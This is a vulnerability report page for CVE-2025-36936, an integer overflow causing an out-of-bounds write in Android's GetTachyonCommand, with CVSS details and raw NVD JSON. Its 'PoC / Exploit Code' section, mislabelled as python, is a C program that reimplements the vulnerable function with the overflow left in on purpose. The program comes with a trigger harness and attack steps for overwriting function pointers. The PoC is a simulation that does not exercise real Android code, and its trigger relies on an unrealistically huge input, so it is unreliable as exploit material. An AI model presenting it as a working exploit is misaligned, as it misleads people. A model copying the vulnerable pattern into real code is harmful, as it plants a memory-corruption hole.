Security Vulnerability Report
中文
CVE-2025-36936 CVSS 7.8 HIGH

CVE-2025-36936

Published: 2025-12-11 20:15:58
Last Modified: 2026-01-05 21:16:10
Source: [email protected]

Description

In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android (未安装2025年12月安全补丁的版本)
Pixel设备 (未更新至2025-12-01安全补丁级别)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> // Simulated vulnerable GetTachyonCommand function // Original vulnerable code in tachyon_server_common.h typedef struct { char* buffer; size_t length; uint32_t command_id; } TachyonCommand; int GetTachyonCommand(char* input, size_t input_len, TachyonCommand* cmd) { // Vulnerable: integer overflow in length calculation // If input_len is close to SIZE_MAX, the addition may overflow size_t total_len = input_len + sizeof(uint32_t); // Allocate buffer based on potentially overflowed length cmd->buffer = (char*)malloc(total_len); if (!cmd->buffer) return -1; // Copy command data without proper bounds checking // This can cause out-of-bounds write if total_len was overflowed memcpy(cmd->buffer, input, input_len); // Copy command ID after the input data memcpy(cmd->buffer + input_len, &cmd->command_id, sizeof(uint32_t)); cmd->length = total_len; return 0; } // Proof of concept trigger int main(int argc, char* argv[]) { if (argc < 2) { printf("Usage: %s <malicious_input_file>\n", argv[0]); return 1; } FILE* fp = fopen(argv[1], "rb"); if (!fp) { printf("Cannot open input file\n"); return 1; } // Read malicious input that triggers integer overflow fseek(fp, 0, SEEK_END); size_t file_size = ftell(fp); fseek(fp, 0, SEEK_SET); char* malicious_data = (char*)malloc(file_size); fread(malicious_data, 1, file_size, fp); fclose(fp); TachyonCommand cmd; memset(&cmd, 0, sizeof(TachyonCommand)); printf("Triggering CVE-2025-36936 integer overflow...\n"); // This call may trigger the vulnerability int result = GetTachyonCommand(malicious_data, file_size, &cmd); if (result == 0 && cmd.buffer) { printf("Command processed, potential OOB write occurred\n"); free(cmd.buffer); } free(malicious_data); return result; } // Attack scenario: // 1. Prepare input with length close to SIZE_MAX - sizeof(uint32_t) // 2. This causes total_len to overflow and become small // 3. malloc() allocates small buffer // 4. memcpy() writes full input_len bytes to small buffer // 5. Out-of-bounds memory corruption occurs // 6. Attacker can overwrite function pointers or security tokens

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36936", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:58.140", "lastModified": "2026-01-05T21:16:10.260", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.